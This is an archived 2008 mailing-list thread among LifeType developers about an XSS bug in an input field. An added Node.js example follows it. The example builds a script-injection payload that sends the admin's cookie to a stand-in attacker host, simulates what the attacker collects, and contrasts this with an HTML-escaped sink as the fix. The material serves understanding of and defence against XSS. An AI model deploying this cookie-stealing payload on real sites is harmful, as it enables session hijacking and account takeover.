[pLog-svn] Lifetype 1.2.8 ...

Matt Wood matt at woodzy.com
Mon May 5 10:53:16 EDT 2008


the typo was <input value="%22 <script>something</script>">

On Mon, May 5, 2008 at 10:50 AM, Jon Daley <plogworld at jon.limedaley.com>
wrote:

>        I understand that XSS can do stuff, I'd just like to see a specific
> example for this particular bug.  From the example on security focus, it had
> an empty value="" in the submit tag, which I am assuming is a typo,
> otherwise I don't see how there is anything that can be done on the server
> side to fix it.
>        Can anyone make a bit of javascript that actually gets something
> interesting using this bug?  Then we can look into general purpose solutions
> for fixing it, rather than one input at a time.
>
>
> On Mon, 5 May 2008, Matt Wood wrote:
>
> > Here is a common exploitation scenario for you...
> >
> > An Attacker is targeting the lifetype.net site, he wants admin.
> >
> > He knows from emails and reading around that Oscar, Reto, Mark and Jon are
> > likely to have admin on that page, so he makes a webpage on geocities or
> > google or something.
> >
> > On this webpage he has javascript (or a meta refresh tag or an HTTP 302)
> > that immediately redirects you to lifetype.net/admin.php with some
> > javascript payload utilizing the XSS exploit.
> >
> > This javascript payload can utilize XSS to create an img tag, this img tag
> > has a src of
> > http://attackpage/record.php?data=admincredentials-base64ed(orsomething)
> > as long as the data fits in the get parameters. You could also
> > create a form and have no limit.
> >
> > Now all the attacker has to do is email each of you telling you that he has
> > found a serious bug in lifetype, and he has screenshots on this page
> > http://google/blah.(html|php|jpg) (depending on his level of control of the
> > site). Maybe he even puts screen shots on there so it doesn't look too
> > scary... and uses an iframe to do the actual attack. You would never know
> > unless you are monitoring all your traffic through a proxy.
> >
> > XSS is ALWAYS serious.
> >
> > On Mon, May 5, 2008 at 1:00 AM, Mark Wu <markplace at gmail.com> wrote:
> >
> > > > Can you post an example?  I am still not getting how
> > > > the server-side is involved. I understand that if I put
> > > > javascript on the admin's site, the javascript would have
> > > > access to stuff, but the browser is supposed to block
> > > > javascript from grabbing stuff from one site and posting it
> > > > to another, right?  So, somehow he grabs stuff via
> > > > javascript, posts it to admin.php which then posts stuff to
> > > > another site?
> > > >
> > >
> > > I have no idea either. Reto, if you can provide an example here, that
> > > will be very helpful.
> > >
> > > > Sure, that's fine, but as far as I can tell, all inputs
> > > > would be susceptible to the same problem, so fixing one
> > > > variable isn't really a fix.
> > > >
> > >
> > > Not "all" inputs, just those inputs where we use the string validator and
> > > that are not filtered by htmlfilter (strip tags) or are displayed without
> > > escaping html special characters ...
> > >
> > > I think quite few ..
> > >
> > > Mark
> > >
> > > _______________________________________________
> > > pLog-svn mailing list
> > > pLog-svn at devel.lifetype.net
> > > http://limedaley.com/mailman/listinfo/plog-svn
> > >
> > >
> >
> --
> Jon Daley
> http://jon.limedaley.com/
>
> Truth is beautiful, without doubt; but so are lies.
> -- Ralph Waldo Emerson
>
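Jon asked for a concrete piece of javascript that gets something interesting out of this bug, and for a general-purpose fix rather than patching one input at a time. The following is an added example, written for this edit; it is not LifeType code and not code posted by anyone in the thread. It models the sink Matt and Mark describe (a request parameter echoed into `<input value="...">` without escaping HTML special characters) in Node.js rather than PHP, puts the same sink with output encoding next to it, builds the attribute-breakout payload with the `<img>`-based cookie exfiltration from Matt's scenario, and shows what the attacker's collector sees. `lifetype.net/admin.php` and `http://attackpage/record.php` are taken from Matt's message; the `q` parameter name, the sample cookie and every function name are hypothetical. `btoa` and `document.cookie` in the payload string only run in the victim's browser once the page is rendered.

```javascript
// Added example, not LifeType code and not code from anyone in this thread.
// Node.js. It models the bug under discussion: a request parameter echoed
// into <input value="..."> without escaping HTML special characters, next to
// the same sink with output encoding, and builds the payload Matt describes.
// The parameter name "q" and all function names are hypothetical.

const ATTACKER_SINK = "http://attackpage/record.php"; // from Matt's scenario

// Vulnerable sink: the value is interpolated raw, so a double quote in it
// ends the attribute and a > ends the tag.
function renderInputVulnerable(value) {
  return `<input type="text" name="q" value="${value}">`;
}

// Hardened sink: escape the characters that carry meaning in HTML before
// interpolating (the equivalent of PHP's htmlspecialchars with ENT_QUOTES).
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function renderInputSafe(value) {
  return `<input type="text" name="q" value="${escapeHtml(value)}">`;
}

// The injected payload: close the value attribute and the input tag, then a
// script that ships document.cookie to the attacker inside an <img> request
// (the base64-encoded data in a GET parameter from the thread). The base64
// is URL-encoded so a "+" in it is not decoded as a space by the collector.
const exfilScript =
  'var i=new Image();i.src="' + ATTACKER_SINK +
  '?data="+encodeURIComponent(btoa(document.cookie));';
const payload = '"><script>' + exfilScript + '</script>';

// The link the attacker's page redirects the admin to; %22 is the URL-encoded
// double quote that opens the breakout.
function buildAttackUrl(base) {
  return base + "?q=" + encodeURIComponent(payload);
}

// Minimal stand-in for the server: parse the request URL, take the q
// parameter, and hand it to the chosen renderer.
function handleRequest(requestUrl, render) {
  const q = new URL(requestUrl).searchParams.get("q") || "";
  return render(q);
}

// Does the rendered page contain a script element the browser would run?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// What the attacker's record.php sees: the exfiltrated cookie, base64-decoded
// from the data parameter of the image request.
function recordedData(imageRequestUrl) {
  const data = new URL(imageRequestUrl).searchParams.get("data") || "";
  return Buffer.from(data, "base64").toString("utf8");
}

// Walk through the scenario against both sinks.
function demo() {
  const attackUrl = buildAttackUrl("http://lifetype.net/admin.php");
  const vulnerable = handleRequest(attackUrl, renderInputVulnerable);
  const hardened = handleRequest(attackUrl, renderInputSafe);
  console.log("attack URL:      ", attackUrl);
  console.log("vulnerable page: ", vulnerable);
  console.log("hardened page:   ", hardened);
  console.log("script runs?     ", containsScriptTag(vulnerable), "/",
              containsScriptTag(hardened));
  // Constructed sample of the image request the payload would make.
  const fakeCookie = "PHPSESSID=0123456789abcdef";
  const imgUrl = ATTACKER_SINK + "?data=" +
    encodeURIComponent(Buffer.from(fakeCookie).toString("base64"));
  console.log("attacker records:", recordedData(imgUrl));
  return { attackUrl, vulnerable, hardened };
}

demo();
```

Run it with `node` and compare the two rendered lines: the vulnerable sink emits `value=""><script>...`, while the hardened sink keeps the whole payload inside the attribute as `&quot;&gt;&lt;script&gt;...`. The point for the fix discussion is that the escaping lives at the output sink, so it covers every value that reaches that template regardless of which input validator let it in.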